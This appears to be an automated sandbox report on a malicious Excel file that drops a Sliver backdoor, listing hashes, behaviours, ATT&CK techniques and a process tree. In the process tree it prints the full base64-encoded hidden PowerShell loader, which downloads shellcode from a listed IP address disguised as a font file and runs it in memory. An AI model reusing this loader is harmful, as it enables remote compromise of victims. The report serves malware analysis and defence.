sliver | 8c06ae3bb8173ee779dc548b1c8210fae5692fe209b9dcee6a7d9a9500523537

General

Target

8c06ae3bb8173ee779dc548b1c8210fae5692fe209b9dcee6a7d9a9500523537.xls
Size

46KB
MD5

93313463d5535a1d7c8c0d394b842259
SHA1

243adf8df383fd06307d34244e31c388618de540
SHA256

8c06ae3bb8173ee779dc548b1c8210fae5692fe209b9dcee6a7d9a9500523537
SHA512

2e630df9f475e6913251b7d4c161a832d5ad5502456832abd61bc9dfaa7cf3613c5e789c3957c8dcf5c941c14806c2b9279c312ff7a03516287302cc6f0cfcaf
SSDEEP

768:B4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:+SFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1236	640	powershell.exe	82

Sliver RAT v2 5 IoCs

resource	yara_rule
behavioral2/memory/1236-50-0x0000015D439C0000-0x0000015D4443E000-memory.dmp	SliverRAT_v2
behavioral2/memory/1236-52-0x0000015D44EC0000-0x0000015D459A6000-memory.dmp	SliverRAT_v2
behavioral2/memory/1236-53-0x0000015D44EC0000-0x0000015D459A6000-memory.dmp	SliverRAT_v2
behavioral2/memory/1236-51-0x0000015D44EC0000-0x0000015D459A6000-memory.dmp	SliverRAT_v2
behavioral2/memory/1236-54-0x0000015D44EC0000-0x0000015D459A6000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 24 IoCs

flow	pid	Process
21	1236	powershell.exe
24	1236	powershell.exe
27	1236	powershell.exe
33	1236	powershell.exe
34	1236	powershell.exe
37	1236	powershell.exe
38	1236	powershell.exe
39	1236	powershell.exe
40	1236	powershell.exe
41	1236	powershell.exe
42	1236	powershell.exe
43	1236	powershell.exe
44	1236	powershell.exe
53	1236	powershell.exe
58	1236	powershell.exe
59	1236	powershell.exe
60	1236	powershell.exe
61	1236	powershell.exe
62	1236	powershell.exe
63	1236	powershell.exe
64	1236	powershell.exe
65	1236	powershell.exe
66	1236	powershell.exe
67	1236	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1236	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
640	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1236	powershell.exe
1236	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1236	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
640	EXCEL.EXE
640	EXCEL.EXE
640	EXCEL.EXE
640	EXCEL.EXE
640	EXCEL.EXE
640	EXCEL.EXE
640	EXCEL.EXE
640	EXCEL.EXE
640	EXCEL.EXE
640	EXCEL.EXE
640	EXCEL.EXE
640	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 640 wrote to memory of 1236	640	EXCEL.EXE	86
PID 640 wrote to memory of 1236	640	EXCEL.EXE	86
PID 1236 wrote to memory of 1620	1236	powershell.exe	89
PID 1236 wrote to memory of 1620	1236	powershell.exe	89
PID 1620 wrote to memory of 944	1620	csc.exe	90
PID 1620 wrote to memory of 944	1620	csc.exe	90

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\8c06ae3bb8173ee779dc548b1c8210fae5692fe209b9dcee6a7d9a9500523537.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1236
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tx1ytn1o\tx1ytn1o.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1620
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC719.tmp" "c:\Users\Admin\AppData\Local\Temp\tx1ytn1o\CSC757352A7719640FE88E51D27A2C3B72C.TMP"
      4⤵
      PID:944

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESC719.tmp

Filesize
1KB

MD5
e8ad78ade92b05df7b803171dea95d95

SHA1
7c523067ac8bfb4a7382f21544090c055de919aa

SHA256
f31451b5781a79f47c070ff1565bc08ad85006df06a45ac5377809f34824c0c2

SHA512
a5516a02004e8fd7c9e6eb1c489ff0b8abc97883f8d3944cf8f614e1973cf2a32ddbac031e5a3a1c5d48f65ba52612f91ed9486352a8ea482e3375650450e94e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5eshsjtx.iyc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tx1ytn1o\tx1ytn1o.dll

Filesize
3KB

MD5
8c878f3042a3a67923838053895d6866

SHA1
269ecf8ec0ec64fde8b4eb47e6d170883c7fc3d8

SHA256
ef993a5fb4ee0cab5cfde195e1f048e89c143abd912b5acb1000f315327a617f

SHA512
18e7be92999d23480d6a874f77858b7aa742ec7c211c0724662de4b2939324ee1b54778c4aa09a6399dbee48679a3e0b031c459ee3320436b51dbed53e723967

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
676B

MD5
dd24d5b95edb455a24cc2b23a5ee044f

SHA1
8eacf8dce4c11d57aa132b876db14e65a02a5829

SHA256
833eaad71c0ab57a4806ebcd624782088c436d03f30eb3a0ca4bd300c0724571

SHA512
b6f00b0dfa2567d21e2dba989961a675d30f370d8a8e686f36fbed3223c6eb037e30ffd303958e64d126b918e3f47e05fc260cfc61866f16f4c332b7b489051b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tx1ytn1o\CSC757352A7719640FE88E51D27A2C3B72C.TMP

Filesize
652B

MD5
c2989881614ee547dae279cb606eeaa8

SHA1
1454ebda320a1b6f89c2b8828a71813688db7059

SHA256
47b70730123e075ed00cc660924d03335f727b5a20def0e458402244a2e1fc74

SHA512
8d146bf3584cf4c810e3adab3476a7309ad93ae9b085add54ef71a34944f01d9930abec004436f7ed386db694f723f34249f397cae17079ff84dbb60f70afdeb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tx1ytn1o\tx1ytn1o.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tx1ytn1o\tx1ytn1o.cmdline

Filesize
369B

MD5
45ad7a45f3304a2fea921058d361b6e7

SHA1
6eac757fb4a8a50158cfb2c9e86c070883c3f285

SHA256
1454991295da00fd02a8c92dfabdd400dc7ac8806e543b376f5d153e1ee374fd

SHA512
9480d280588d25a2bc5623f19c387c01fc866ffdc1b50fbf97014956180c24d266ade923cdcd7f312dc5d139534537bcb2a2208af7fdf8f0376d92283d76ce52

Download Submit
memory/640-2-0x00007FF851FF0000-0x00007FF852000000-memory.dmp

Filesize
64KB

Download
memory/640-3-0x00007FF851FF0000-0x00007FF852000000-memory.dmp

Filesize
64KB

Download
memory/640-12-0x00007FF891AD0000-0x00007FF891B9D000-memory.dmp

Filesize
820KB

Download
memory/640-7-0x00007FF84FBB0000-0x00007FF84FBC0000-memory.dmp

Filesize
64KB

Download
memory/640-1-0x00007FF891AD0000-0x00007FF891B9D000-memory.dmp

Filesize
820KB

Download
memory/640-0-0x00007FF851FF0000-0x00007FF852000000-memory.dmp

Filesize
64KB

Download
memory/640-6-0x00007FF891AD0000-0x00007FF891B9D000-memory.dmp

Filesize
820KB

Download
memory/640-4-0x00007FF851FF0000-0x00007FF852000000-memory.dmp

Filesize
64KB

Download
memory/640-5-0x00007FF851FF0000-0x00007FF852000000-memory.dmp

Filesize
64KB

Download
memory/640-8-0x00007FF84FBB0000-0x00007FF84FBC0000-memory.dmp

Filesize
64KB

Download
memory/640-49-0x00007FF891AD0000-0x00007FF891B9D000-memory.dmp

Filesize
820KB

Download
memory/1236-45-0x0000015D2AEA0000-0x0000015D2AEA8000-memory.dmp

Filesize
32KB

Download
memory/1236-50-0x0000015D439C0000-0x0000015D4443E000-memory.dmp

Filesize
10.5MB

Download
memory/1236-52-0x0000015D44EC0000-0x0000015D459A6000-memory.dmp

Filesize
10.9MB

Download
memory/1236-53-0x0000015D44EC0000-0x0000015D459A6000-memory.dmp

Filesize
10.9MB

Download
memory/1236-51-0x0000015D44EC0000-0x0000015D459A6000-memory.dmp

Filesize
10.9MB

Download
memory/1236-54-0x0000015D44EC0000-0x0000015D459A6000-memory.dmp

Filesize
10.9MB

Download
memory/1236-29-0x0000015D431E0000-0x0000015D43202000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads